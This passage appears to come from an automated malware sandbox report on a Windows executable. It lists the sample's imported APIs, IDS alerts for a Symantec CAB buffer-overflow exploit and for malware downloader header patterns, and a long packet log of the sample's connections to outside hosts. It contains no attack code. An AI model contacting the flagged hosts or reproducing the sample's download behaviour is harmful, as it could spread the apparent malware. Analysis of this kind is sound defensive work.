                                                                                                                        USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                        KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-11-11T15:27:16.442385+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649774TCP
                                                                                                                        2024-11-11T15:27:55.164712+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649982TCP
                                                                                                                        2024-11-11T15:28:04.554730+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649983142.250.186.46443TCP
                                                                                                                        2024-11-11T15:28:11.755827+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649985132.226.8.16980TCP
                                                                                                                        2024-11-11T15:28:13.083971+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649985132.226.8.16980TCP
                                                                                                                        2024-11-11T15:28:13.593175+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649987188.114.96.3443TCP
                                                                                                                        2024-11-11T15:28:15.052708+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649988132.226.8.16980TCP
                                                                                                                        2024-11-11T15:28:15.547974+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649989188.114.96.3443TCP
                                                                                                                        2024-11-11T15:28:21.416312+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649998188.114.96.3443TCP
                                                                                                                        2024-11-11T15:28:24.187990+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650002188.114.96.3443TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 11, 2024 15:28:03.614357948 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:03.614387035 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:03.614469051 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:03.628793001 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:03.628815889 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.221445084 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.221580029 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.222222090 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.222287893 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.272789955 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.272810936 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.273168087 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.273718119 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.277149916 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.323343992 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.554729939 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.557775974 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.557785034 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.557909966 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.558382034 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.558429003 CET44349983142.250.186.46192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.558518887 CET49983443192.168.2.6142.250.186.46
                                                                                                                        Nov 11, 2024 15:28:04.591125011 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:04.591156960 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:04.591418982 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:04.591952085 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:04.591967106 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:05.186217070 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:05.186307907 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:05.215204954 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:05.215228081 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:05.215529919 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:05.215583086 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:05.281794071 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:05.327344894 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.782521963 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.782602072 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.787976980 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.788062096 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.863353014 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.863472939 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.863497972 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.863548040 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.863554001 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.863616943 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.863636971 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.863647938 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.863658905 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.863704920 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.866202116 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.866265059 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.866271973 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.866309881 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.872203112 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.872262955 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.872272015 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.872339964 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.877794027 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.877859116 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.877868891 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.877926111 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.883805990 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.883865118 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.883867025 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.883876085 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.883917093 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.889632940 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.889700890 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.889708996 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.889832973 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.895587921 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.895656109 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.895663023 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.895708084 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.901350975 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.901410103 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.901417017 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.901459932 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.944403887 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.944459915 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.944480896 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.944524050 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.944647074 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.944684982 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.944897890 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.944931984 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.944947004 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.944983959 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.945334911 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.945374966 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.945550919 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.945605040 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.945610046 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.945645094 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.945651054 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.945661068 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.945688963 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.945719957 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.946333885 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.946374893 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.946388006 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.946429014 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.947016954 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.947057962 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.947062969 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.947105885 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.947215080 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.947259903 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.947330952 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.947370052 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.953409910 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.953449011 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.953464985 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.953474045 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.953496933 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.953531027 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.953993082 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.954046965 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.954051018 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.954093933 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.958843946 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.958904982 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.958915949 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.958956957 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.961724997 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.961781979 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.961788893 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.961831093 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.965560913 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.965615988 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.965663910 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.965706110 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.969381094 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.969432116 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.969440937 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.969481945 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.973293066 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.973366976 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.973373890 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.973414898 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.976990938 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.977042913 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.977056980 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.977103949 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.980772972 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.980824947 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.980875969 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.980917931 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.984642982 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.984714031 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.984720945 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.984762907 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.988583088 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.988642931 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.988646984 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.988692045 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.992388964 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.992449999 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:07.992455006 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:07.992502928 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.025887966 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.025954962 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.025960922 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.025995016 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.026005983 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.026010036 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.026031971 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.026071072 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.026474953 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.026518106 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.026523113 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.026560068 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.026931047 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.026973963 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.026978970 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027018070 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.027021885 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027060032 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027061939 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.027076960 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027110100 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.027808905 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027853966 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.027858973 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027896881 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.027919054 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.027965069 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.027970076 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.028009892 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.028625011 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.028683901 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.028688908 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.028719902 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.028723955 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.028764963 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.029217005 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.029259920 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.029263973 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.029306889 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.032128096 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.032182932 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.032200098 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.032239914 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.034518957 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.034564972 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.034570932 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.034611940 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.036089897 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.036144018 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.036149025 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.036191940 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.036195993 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.036238909 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.038218021 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.038263083 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.038269997 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.038310051 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.040191889 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.040239096 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.040246010 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.040288925 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.042061090 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.042107105 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.042226076 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.042274952 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.044116974 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.044169903 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.044176102 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.044215918 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.046180010 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.046224117 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.046228886 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.046264887 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.048099041 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.048161030 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.048166990 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.048211098 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.049942017 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.049995899 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.050000906 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.050040960 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.051824093 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.051873922 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.051878929 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.051913977 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.053713083 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.053774118 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.053778887 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.053821087 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.055681944 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.055736065 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.055747032 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.055802107 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.057492971 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.057549953 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.057554960 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.057636023 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.059396982 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.059448957 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.059456110 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.059504986 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.061176062 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.061223030 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.061235905 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.061289072 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.063258886 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.063333035 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.063340902 CET44349984172.217.18.1192.168.2.6
